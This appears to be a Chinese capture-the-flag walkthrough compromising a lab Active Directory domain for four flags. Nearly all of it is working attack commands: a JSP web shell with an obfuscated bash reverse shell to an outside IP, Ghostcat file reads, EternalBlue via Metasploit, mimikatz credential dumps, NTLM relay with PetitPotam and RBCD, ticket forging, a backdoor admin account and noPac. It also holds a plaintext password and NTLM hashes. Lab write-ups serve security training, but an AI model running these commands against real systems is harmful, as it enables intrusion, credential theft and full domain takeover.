目录
flag1
fscan扫出来
访问8080
扫出./docs/目录
访问发现是tomcat 9.0.30
python ajpShooter.py http://39.99.135.143:8080 8009 /WEB-INF/web.xml read看到文件上传路由
访问./UploadServlet
上传恶意文件
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%> 
python ajpShooter.py http://39.99.135.143:8080 8009 /upload/356aefc49ff23dd7de8998158421d8e2/20241016105901376.txt eval
成功反弹shell
读到flag1
cat /root/flag/flag01.txt
flag2
wget下载fscan和frp,搭代理扫内网
扫出来
- 172.22.11.76 已经拿下
- 172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010
- 172.22.11.26 XIAORANG\XR-LCM3AE8B
- 172.22.11.6 XIAORANG\XIAORANG-DC
先把永恒之蓝打了
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
run拿到shell
cat C:/users/administrator/flag/flag02.txt
flag3
抓到机器账户和yangmei的哈希
load kiwi
creds_all 
proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav 2>/dev/null 看到26开启了webclient服务
tomcat重新弹一下shell
运行
socat tcp-listen:80,reuseaddr,fork tcp:124.222.136.33:8848在vps上运行
./frps -c ./frps.ini
[common]
bind_port = 7099
[tcp_1200]
type = tcp
local_ip = 127.0.0.1
local_port = 8848在本地kali上运行
./frpc -c ./frpc.ini
[common]
server_addr = vpsip
server_port = 7099
[plugin_socks6]
type = tcp
remote_port = 8848
local_port = 80
local_ip = 127.0.0.1curl一下,发现确实被本地kali接收到
开启ntlmrelayx,利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD,接着使用Petitpotam触发XR-LCM3AE8B认证到172.22.11.76
proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-accessproxychains python PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26 
用之前172.22.11.45上抓的机器账户XR-DESKTOP$哈希打172.22.11.26的RBCD,申请ST票据
proxychains4 impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :1feeaf9a8e1e24a26e80c401c990b325 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6
导入票据
export KRB5CCNAME=administrator.ccache把172.22.11.26 XIAORANG\XR-LCM3AE8B加到/etc/hosts里后psexec无密码连接
proxychains python psexec.py xiaorang.lab/[email protected] -k -no-pass -target-ip 172.22.11.26 -codec gbk读到flag3
type C:\users\administrator\flag\flag03.txt
flag4
发现存在MA_Admin组,可以添加账户
添加本地管理员
net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add
RDP连上去172.22.11.26
上传猕猴桃
以管理员身份运行
privilege::debug
sekurlsa::logonpasswords抓到一个zhanghui用户的哈希1232126b24cdf8c9bd2f788a9d7c7ed1,他在MA_Admin组,对computer能够创建对象,能向域中添加机器账户,所以能打noPac
proxychains python noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
读到flag4
type C:\users\administrator\flag\flag04.txt 